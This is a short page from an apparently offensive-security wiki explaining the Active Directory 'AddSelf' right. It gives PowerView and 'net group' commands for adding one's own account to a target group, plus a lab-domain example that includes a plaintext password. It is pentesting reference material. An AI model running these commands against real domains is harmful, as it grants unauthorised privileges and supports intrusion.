AddSelf

Information

The principal has the ability to add itself to the target group.

Exploitation

Add User to Group

This can be done natively (opsec considerations) or with PowerView.

# connect to the DC
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
# add user to the group
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
# confirm group membership
PV > Get-DomainGroupMember -Identity

# add user to the group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
# confirm group membership
Get-DomainGroupMember -Identity '<GROUP>'

# add user to the group
net group '<GROUP>' '<USER>' /add /domain
# confirm group membership
net group <GROUP> /domain

Resources

PreviousPermissions NextDCSync

Last updated 1 year ago

Was this helpful?